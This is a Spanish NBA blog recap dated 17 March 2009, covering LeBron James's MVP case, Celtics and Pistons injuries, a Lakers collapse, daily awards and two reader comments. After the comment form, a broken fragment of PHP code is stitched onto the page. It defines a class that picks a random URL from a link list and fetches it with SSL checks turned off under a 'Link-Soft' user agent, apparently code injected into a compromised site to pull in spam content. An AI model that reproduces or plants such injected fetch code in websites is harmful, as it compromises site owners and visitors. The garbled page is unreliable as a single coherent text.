La crónica (17/03/2009): Sant Patrick’s Day

18 de March de 2009 por TheDeerHunter

By TheDeerHunter&Txusma

Mordisco gordo al polémico premio del MVP. Victoria de Cavs y derrotas de Celtics, Magic e incluso de Lakers, y para colmo con otra actuación indiscutible de el Elegido contra un rival de entidad. Si la regular hubiera terminado hoy, sin duda sería para él el premio y, lo que es más importante, de manera justa desde la mayoría de los puntos de vista que suelen ponderar para el mismo. Eso sin desmerecer al resto de candidatos.

La carrera en el Este parece casi decidida. Si los Celtics ponen un circo les crecen los enanos. Ayer a las lesiones de Garnett y Davis, se unió la de Leon Powe. Con un juego interior formado exclusivamente por Perkins&Moore podrían tener dificultades incluso en primera ronda. Para muestra un botón: El daño que les hizo el frontcourt Brad Miller-Tyus Thomas-Salmons. Diría que ahora mismo en Boston cualquiera firmaría por la segunda plaza y el calendario que les queda es cualquier cosa menos cómodo.

Otro equipo marcado por las lesiones es Detroit. Algunos discutirán el efecto negativo de la ausencia de Iverson, pero nadie debería hacerlo con respecto a las bajas de Hamilton y Rasheed. Con todo, de la mano de un gran Prince y unos sorprendentes Will Bynum y Afflalo le plantaron cara hasta el último instante a los Mavs en Dallas. Con respecto a los locales gran contribución de los de siempre esta temporada (Dirk y Terry) pero la de Kidd es para que alguien que lo aprecie le pida que se lo deje. Es triste verlo arrastrarse de esa manera. ¡Kidd selección!

En el otro partido de máximo interés de la jornada, se volvieron a juntar el hambre con las ganas de comer. Los Lakers, por enésima vez, volvieron a dejarse llevar ganando de 14 en el último cuarto y otra vez un equipo motivado y bien armado le saca los colores. Canastón de Iguodala y otro partido tonto que se les escapa entre los dedos. Lo preocupante es que la gran mayoría de las derrotas se las han ganado a pulso por esta guisa. Partido infame de Kobe que parece haber claudicado en favor de Wade&James.

En el resto de encuentros Atlanta ganó a los Kings; San Antonio a los Timberwolves con Duncan descansando (y Gooden sin rascar bola todavía) y Utah a Washington.

Por último, mención a parte para el bonito duelo entre Baron Davis y Monta Ellis en Oakland. Ya os lo avisábamos ayer.

PREMIOS

MVP: Mientras algunos siguen emperrados en poner en duda el más que probable MVP de Lebron James, el jugador de los Cavs nos sigue deleitando con actuaciones soberbias. Anoche, 43 puntos, 12 rebotes, 8 asistencias y 4 robos contra un equipazo como Orlando Magic.

Rookie: Con Rose a un nivel más bien discreto, el premio cae en Kevin Love que está cuajando un gran final de temporada en ausencia de Al Jefferson. 17 puntos y 19 rebotes para él.

Sorpresa: Relativas sorpresa los grandes partidos de John Salmons y Monta Ellis en las victorias de sus equipos y sorpresas mayúsculas las aportaciones de jugadores como Will Bynum, Aaron Affalo, Anthony Morrow o Oleksiy Pecherov. Si hay un momento en el que los jugadores secundarios pueden lucirse es, sin duda, al final de temporada.

Decepción: 2 puntos, 3 rebotes y 6 asistencias en 30 minutos. No son los numeros de un reserva sino de Jason “Cualquier tiempo pasado fue mejor” Kidd. Mal partido también de Kobe Bryant al que ya no recordábamos anotando menos de 15 puntos…

El mayor esfuerzo en vano: Los Bulls se han llevado una importantísima victoria frente a los Celtics a pesar de los esfuerzos de Paul PierceRajon Rondo que se combinaron para anotar 63 puntos, recoger 12 rebotes y repartir 11 asistencias. ¿Cuando decías que vuelve Garnett?

RAZONES PARA TRASNOCHAR

Hoy miramos al Este. Tocan noches de back-to-back para Magic y Celtics que deben recuperarse de la derrota de ayer porque el 2ª puesto está en juego. Además juegan los Bulls, Nets, Bobcats, Knicks, Bucks o incluso Pacers con la 8ª plaza de la conferencia bailando jornada a jornada.

Heat@Celtics: A las 00:00 hora española juegan los Celtics que vienen de 2 derrotas consecutivas. Muchos problemas con las lesiones y la falta de acoplamiento de los nuevos puede justificar esta mala racha. Con los Cavs demasiado lejos ya está claro que los más importante para los de Boston será recuperar efectivos de aquí al 18 de Abril, pero no estaría de más acabar segundos si no quieren jugar casi todo el camino hasta el anillo con la ventaja de campo en contra. Enfrente Wade y sus Heat que no se acaban de acercar a los Hawks ni se acaban de alejar de los Sixers. Más allá de la carrera por el MVP, los Heat deben demostrar que pueden dar mucha guerra y que son algo más que carne de primera ronda…

El jugador a seguir esta noche es… Dwight Howard. No lo mencionamos mucho, pero de fondo suena su nombre en la carrera por el MVP. Su temporada está siendo brutal, dominando los aros y puliendo poco a poco sus defectos. Los Magic perdieron anoche pero andan en pugna con los Celtics y hoy tienen una buena oportunidad de ganar a los Bucks y el pívot de lucirse ante un juego interior que no destaca precísamente por su defensa.

LA PREGUNTA DEL DÍA

¿Alguien se imagina a los Pistons fuera de los Playoffs?

Comenta

2 comentarios a esta entrada

  1. Txusma dice:
    #1

    Buff… importantísima victoria de los Bulls con actuación estelar de los nuevos… Creo que según vayan acoplándose Chicago ha de ir para arriba y consolidar la octava plaza a la vez que amenazan la séptima.
    Mañana, día importantísimo en la lucha por los Playoffs del Este.

      Citar

  2. sabas dice:
    #2

    No veo a los Pistons fuera de Playoffs: entre la ventaja que tienen y que los que vienene detras tampoco andan sobrados les llega . Ahora esta año vacaciones antes que los años anteriores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>